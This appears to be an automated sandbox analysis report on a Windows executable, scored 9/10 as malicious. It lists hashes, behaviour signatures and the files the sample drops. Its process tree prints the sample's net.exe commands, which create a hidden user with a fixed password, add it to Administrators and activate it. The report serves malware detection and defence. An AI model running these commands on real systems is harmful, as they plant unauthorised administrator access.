Analysis

  • max time kernel
    121s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-01-2025 08:45

General

  • Target

    ec7b605aaefd00f0507f43c78590266b74345bc9308eba26fc542b6a0ae5e133.exe

  • Size

    6.9MB

  • MD5

    04ce0c6078e128a91ef031f68304b2c5

  • SHA1

    4f34f7395f4bcc9eba528cefcf43b83689ea388d

  • SHA256

    ec7b605aaefd00f0507f43c78590266b74345bc9308eba26fc542b6a0ae5e133

  • SHA512

    38cc2b6ecf13f725041700cf8ce4f13796fd12fd49171221f083673201d886174b61d45d9665462373dd2115507eadaa82e44f0e59fd72707400d58f19a73590

  • SSDEEP

    196608:y283kdaXMCHGLLc54i1wN+DrRRu7NtbFRKnZMZDYhmh1wlxN8:b/cXMCHWUj7rRQ7XbFsn6ZUEWN

Score
9/10

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Loads dropped DLL 2 IoCs
  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • Runs net.exe
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ec7b605aaefd00f0507f43c78590266b74345bc9308eba26fc542b6a0ae5e133.exe
    "C:\Users\Admin\AppData\Local\Temp\ec7b605aaefd00f0507f43c78590266b74345bc9308eba26fc542b6a0ae5e133.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1256
    • C:\Users\Admin\AppData\Local\Temp\ec7b605aaefd00f0507f43c78590266b74345bc9308eba26fc542b6a0ae5e133.exe
      "C:\Users\Admin\AppData\Local\Temp\ec7b605aaefd00f0507f43c78590266b74345bc9308eba26fc542b6a0ae5e133.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:5088
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c net user hoang92bn C1sco123 /add
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:860
        • C:\Windows\system32\net.exe
          net user hoang92bn C1sco123 /add
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3128
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user hoang92bn C1sco123 /add
            5⤵
              PID:5008
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c net localgroup Administrators hoang92bn /add
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:224
          • C:\Windows\system32\net.exe
            net localgroup Administrators hoang92bn /add
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3744
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 localgroup Administrators hoang92bn /add
              5⤵
                PID:2836
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c net user hoang92bn /active:yes
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1228
            • C:\Windows\system32\net.exe
              net user hoang92bn /active:yes
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1616
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user hoang92bn /active:yes
                5⤵
                  PID:1948

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\_MEI12562\VCRUNTIME140.dll

          Filesize

          117KB

          MD5

          862f820c3251e4ca6fc0ac00e4092239

          SHA1

          ef96d84b253041b090c243594f90938e9a487a9a

          SHA256

          36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

          SHA512

          2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

        • C:\Users\Admin\AppData\Local\Temp\_MEI12562\_bz2.pyd

          Filesize

          83KB

          MD5

          c17dcb7fc227601471a641ec90e6237f

          SHA1

          c93a8c2430e844f40f1d9c880aa74612409ffbb9

          SHA256

          55894b2b98d01f37b9a8cf4daf926d0161ff23c2fb31c56f9dbbac3a61932712

          SHA512

          38851cbd234a51394673a7514110eb43037b4e19d2a6fb79471cc7d01dbcf2695e70df4ba2727c69f1fed56fc7980e3ca37fddff73cc3294a2ea44facdeb0fa9

        • C:\Users\Admin\AppData\Local\Temp\_MEI12562\_decimal.pyd

          Filesize

          274KB

          MD5

          ad4324e5cc794d626ffccda544a5a833

          SHA1

          ef925e000383b6cad9361430fc38264540d434a5

          SHA256

          040f361f63204b55c17a100c260c7ddfadd00866cc055fbd641b83a6747547d5

          SHA512

          0a002b79418242112600b9246da66a5c04651aecb2e245f0220b2544d7b7df67a20139f45ddf2d4e7759ce8cc3d6b4be7f98b0a221c756449eb1b6d7af602325

        • C:\Users\Admin\AppData\Local\Temp\_MEI12562\_hashlib.pyd

          Filesize

          63KB

          MD5

          422e214ca76421e794b99f99a374b077

          SHA1

          58b24448ab889948303cdefe28a7c697687b7ebc

          SHA256

          78223aef72777efc93c739f5308a3fc5de28b7d10e6975b8947552a62592772b

          SHA512

          03fcccc5a300cc029bef06c601915fa38604d955995b127b5b121cb55fb81752a8a1eec4b1b263ba12c51538080335dabaef9e2b8259b4bf02af84a680552fa0

        • C:\Users\Admin\AppData\Local\Temp\_MEI12562\_lzma.pyd

          Filesize

          155KB

          MD5

          66a9028efd1bb12047dafce391fd6198

          SHA1

          e0b61ce28ea940f1f0d5247d40abe61ae2b91293

          SHA256

          e44dea262a24df69fd9b50b08d09ae6f8b051137ce0834640c977091a6f9fca8

          SHA512

          3c2a4e2539933cbeb1d0b3c8ef14f0563675fd53b6ef487c7a5371dfe2ee1932255f91db598a61aaadacd8dc2fe2486a91f586542c52dfc054b22ad843831d1e

        • C:\Users\Admin\AppData\Local\Temp\_MEI12562\_socket.pyd

          Filesize

          82KB

          MD5

          abf998769f3cba685e90fa06e0ec8326

          SHA1

          daa66047cf22b6be608127f8824e59b30c9026bf

          SHA256

          62d0493ced6ca33e2fd8141649dd9889c23b2e9afc5fdf56edb4f888c88fb823

          SHA512

          08c6b3573c596a15accf4936533567415198a0daab5b6e9824b820fd1f078233bbc3791fde6971489e70155f7c33c1242b0b0a3a17fe2ec95b9fadae555ed483

        • C:\Users\Admin\AppData\Local\Temp\_MEI12562\base_library.zip

          Filesize

          1.3MB

          MD5

          18c3f8bf07b4764d340df1d612d28fad

          SHA1

          fc0e09078527c13597c37dbea39551f72bbe9ae8

          SHA256

          6e30043dfa5faf9c31bd8fb71778e8e0701275b620696d29ad274846676b7175

          SHA512

          135b97cd0284424a269c964ed95b06d338814e5e7b2271b065e5eabf56a8af4a213d863dd2a1e93c1425fadb1b20e6c63ffa6e8984156928be4a9a2fbbfd5e93

        • C:\Users\Admin\AppData\Local\Temp\_MEI12562\libcrypto-3.dll

          Filesize

          5.0MB

          MD5

          123ad0908c76ccba4789c084f7a6b8d0

          SHA1

          86de58289c8200ed8c1fc51d5f00e38e32c1aad5

          SHA256

          4e5d5d20d6d31e72ab341c81e97b89e514326c4c861b48638243bdf0918cfa43

          SHA512

          80fae0533ba9a2f5fa7806e86f0db8b6aab32620dde33b70a3596938b529f3822856de75bddb1b06721f8556ec139d784bc0bb9c8da0d391df2c20a80d33cb04

        • C:\Users\Admin\AppData\Local\Temp\_MEI12562\python313.dll

          Filesize

          5.8MB

          MD5

          3aad23292404a7038eb07ce5a6348256

          SHA1

          35cac5479699b28549ebe36c1d064bfb703f0857

          SHA256

          78b1dd211c0e66a0603df48da2c9b67a915ab3258701b9285d3faa255ed8dc25

          SHA512

          f5b6ef04e744d2c98c1ef9402d7a8ce5cda3b008837cf2c37a8b6d0cd1b188ca46585a40b2db7acf019f67e6ced59eff5bc86e1aaf48d3c3b62fecf37f3aec6b

        • C:\Users\Admin\AppData\Local\Temp\_MEI12562\select.pyd

          Filesize

          31KB

          MD5

          62fe3761d24b53d98cc9b0cbbd0feb7c

          SHA1

          317344c9edf2fcfa2b9bc248a18f6e6acedafffb

          SHA256

          81f124b01a85882e362a42e94a13c0eff2f4ccd72d461821dc5457a789554413

          SHA512

          a1d3da17937087af4e5980d908ed645d4ea1b5f3ebfab5c572417df064707cae1372b331c7096cc8e2e041db9315172806d3bc4bb425c6bb4d2fa55e00524881

        • C:\Users\Admin\AppData\Local\Temp\_MEI12562\unicodedata.pyd

          Filesize

          695KB

          MD5

          43b8b61debbc6dd93124a00ddd922d8c

          SHA1

          5dee63d250ac6233aac7e462eee65c5326224f01

          SHA256

          3f462ee6e7743a87e5791181936539642e3761c55de3de980a125f91fe21f123

          SHA512

          dd4791045cf887e6722feae4442c38e641f19ec994a8eaf7667e9df9ea84378d6d718caf3390f92443f6bbf39840c150121bb6fa896c4badd3f78f1ffe4de19d